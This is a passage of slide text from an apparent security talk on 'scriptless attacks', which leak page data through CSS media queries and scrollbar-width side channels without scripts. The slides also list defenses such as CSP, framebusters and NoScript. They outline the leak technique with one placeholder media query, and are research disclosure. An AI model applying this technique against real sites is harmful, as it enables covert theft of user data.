  • 44. (go CSS)  Remember the smart scrollbars?  Same thing all over again  But this time for all browsers please  CSS Media Queries to the rescue!  We can deploy selective CSS depending on:  Viewport width, viewport height  @media screen and (max-width: 400px){*{foo:bar}}  Every character gets a distinct width, and/or height  Once scrollbars appear, the viewport width gets reduced  By the width of the scrollbar  Some Iframe tricks do the job and allow universal scrollbar detection  That's all we need _:D (got your nose)
  • 45. {Demo} DEMO (got your nose)
  • 46. (the perfect leak) (got your nose)
  • 47. {Almost done} (got your nose)
  • 48. (CONCLUSION I) Everything is a side-channel nowadays (Oh my!) (got your nose)
  • 49. (Conclusion II)  Scriptless Attacks versus XSS  Not many differences in impact  More common injcetion scenarios  Affecting sandboxes with HTML5  Information leaks by design  Hard to detect and fix  Timing and Side-Channel  NoScript to the rescue! (got your nose)
  • 50. (defense)  How to protect against features?  How to protect against side-channels  Reduce data leakage?  Change standards?  Build better sandboxes?  Extend SOP to images and other side channels,  Use CSP?  XFO and Framebusters ftw?  Use NoScript if you can! (got your nose)
  • 51. (Future work)  There's a lot more in this  CSRF, injections and side-channels  Challenging attacker creativity  Application and App specific bugs  Scriptless attacks and mobile devices?  Exciting times to come without XSS (got your nose)
  • 52. (The end)  Questions?  Discussion?  Beer? (got your nose)